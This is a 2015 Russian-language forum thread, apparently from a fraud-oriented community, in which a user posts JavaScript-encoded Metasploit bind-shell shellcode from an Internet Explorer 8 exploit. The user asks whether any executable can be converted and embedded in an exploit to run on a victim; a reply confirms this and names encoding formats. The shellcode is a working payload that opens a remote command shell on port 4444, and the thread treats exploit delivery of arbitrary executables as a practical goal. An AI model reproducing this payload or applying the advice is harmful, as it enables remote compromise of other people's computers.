1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

shellcode

Тема в разделе "Помощь по всем вопросам.", создана пользователем zakkk, 10 май 2015.

  1. TopicStarter Overlay
    zakkk

    zakkk

    Регистрация:
    15 май 2013
    Сообщения:
    226
    Симпатии:
    88
    Вот уточнить и подтвердить один момент у спецов хочу

    К примеру сплойт ie 8 , windows 7 Please login or register to view links ( просто к примеру )

    И вот это соответственно шелкод

    Код:
     // Bind shellcode on 4444 :)
        // msf > generate -t js_le
        // windows/shell_bind_tcp - 342 bytes
        // http://www.metasploit.com
        // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
        // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
        // I would keep the shellcode the same size for better reliability :)
        shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
                                 "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
                                 "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
                                 "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
                                 "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
                                 "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
                                 "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
                                 "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
                                 "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
                                 "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
                                 "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
                                 "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
                                 "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
                                 "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
                                 "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
                                 "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
                                 "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
                                 "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
                                 "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
                                 "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
                                 "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
                                 "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
                                 "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
                                 "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
                                 "%u006a%uff53%u41d5");

    Тоесть это exe преобразованный в код , который можно выполнить по средствам языка программирования ? Я могу преобразовать любой эксе , заметить его в коде сплойта и соответственно он выполнится . Так ведь ?
     
    Метки:
  2. AngryBSOD

    AngryBSOD

    Регистрация:
    6 мар 2015
    Сообщения:
    165
    Симпатии:
    140
    По идее да
    Обычно шелл код делается либо из UC, ByteONSTR, HEX коды. Тут UC
     

Поделиться этой страницей

Загрузка...